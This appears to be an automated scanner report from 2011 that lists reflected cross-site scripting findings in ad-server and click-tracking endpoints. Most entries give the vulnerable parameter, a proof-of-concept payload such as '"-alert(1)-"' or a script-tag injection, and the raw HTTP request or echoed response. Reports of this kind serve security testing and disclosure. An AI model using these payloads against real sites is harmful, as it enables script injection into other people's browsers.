The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eff5"-alert(1)-"d3279316554 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:15 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=16629109eff5"-alert(1)-"d3279316554&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88246"-alert(1)-"34f3da19b89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:38 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-11077488246"-alert(1)-"34f3da19b89&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 768d1"-alert(1)-"4d04f2c569 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:47 GMT Content-Length: 9311
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml768d1"-alert(1)-"4d04f2c569&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVN%26%26cid%3DGENRET%3B877237%3B62579858%3B239944212%3B39988944"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64a83"-alert(1)-"d897ed4d1c2 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:53:46 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=8034064a83"-alert(1)-"d897ed4d1c2&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60583"-alert(1)-"42928ca0e0e was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:53:56 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=11078160583"-alert(1)-"42928ca0e0e&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427% ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ec41"-alert(1)-"31c5ba5de38 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:54:25 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=93ec41"-alert(1)-"31c5ba5de38&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2 ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edfc6"-alert(1)-"fc5c4421cff was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:54:16 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078edfc6"-alert(1)-"fc5c4421cff&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17651"-alert(1)-"3f123fd8fd4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:54:06 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=166291017651"-alert(1)-"3f123fd8fd4&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383aa"-alert(1)-"6682829cf01 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:53:36 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781383aa"-alert(1)-"6682829cf01&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e1fc"-alert(1)-"fb131e4ea40 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:54:35 GMT Content-Length: 9308
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml5e1fc"-alert(1)-"fb131e4ea40&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Thrilloftrade.tos%3Fo%3D2%26a%3DIVN%26%26cid%3DGENRET%3B877237%3B62579861%3B239944998%3B39989395"); var fscUrl = url; var fscUrlClickTa ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e433a'%3balert(1)//574f9c7b613 was submitted in the tile parameter. This input was echoed as e433a';alert(1)//574f9c7b613 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ec5c"-alert(1)-"d8956f93e59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1 Host: ad.doubleclick.net.68327.9418.302br.net Proxy-Connection: keep-alive Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b30c"-alert(1)-"9695098fb11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn8b30c"-alert(1)-"9695098fb11/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1 Host: ad.doubleclick.net.68327.9418.302br.net Proxy-Connection: keep-alive Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9017c"-alert(1)-"80544c6b860 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn/B5053148.229017c"-alert(1)-"80544c6b860;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1 Host: ad.doubleclick.net.68327.9418.302br.net Proxy-Connection: keep-alive Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
6.71. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net.68327.9418.302br.net
Path:
/jsi/adi/N5047.Turn/B5053148.22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34676"-alert(1)-"f580a372d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;&34676"-alert(1)-"f580a372d7e=1 HTTP/1.1 Host: ad.doubleclick.net.68327.9418.302br.net Proxy-Connection: keep-alive Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 333cb"-alert(1)-"eeb14d1dc7a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;333cb"-alert(1)-"eeb14d1dc7a HTTP/1.1 Host: ad.doubleclick.net.68327.9418.302br.net Proxy-Connection: keep-alive Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70c35"-alert(1)-"57f7527f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj70c35"-alert(1)-"57f7527f91/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1 Host: ad.doubleclick.net.76705.9611.302br.net Proxy-Connection: keep-alive Referer: http://celebrities.glam.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b70a"-alert(1)-"8de33777c29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com8b70a"-alert(1)-"8de33777c29/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1 Host: ad.doubleclick.net.76705.9611.302br.net Proxy-Connection: keep-alive Referer: http://celebrities.glam.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82738"-alert(1)-"fe73189adbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com/B5234896.782738"-alert(1)-"fe73189adbc;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1 Host: ad.doubleclick.net.76705.9611.302br.net Proxy-Connection: keep-alive Referer: http://celebrities.glam.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
6.76. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net.76705.9611.302br.net
Path:
/jss/adj/N1243.Glam.com/B5234896.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4519b"-alert(1)-"9c0b6de5ed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf?&4519b"-alert(1)-"9c0b6de5ed7=1 HTTP/1.1 Host: ad.doubleclick.net.76705.9611.302br.net Proxy-Connection: keep-alive Referer: http://celebrities.glam.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31976"-alert(1)-"424c6fac2e0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf?31976"-alert(1)-"424c6fac2e0 HTTP/1.1 Host: ad.doubleclick.net.76705.9611.302br.net Proxy-Connection: keep-alive Referer: http://celebrities.glam.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e896c"><script>alert(1)</script>04d920b703b was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.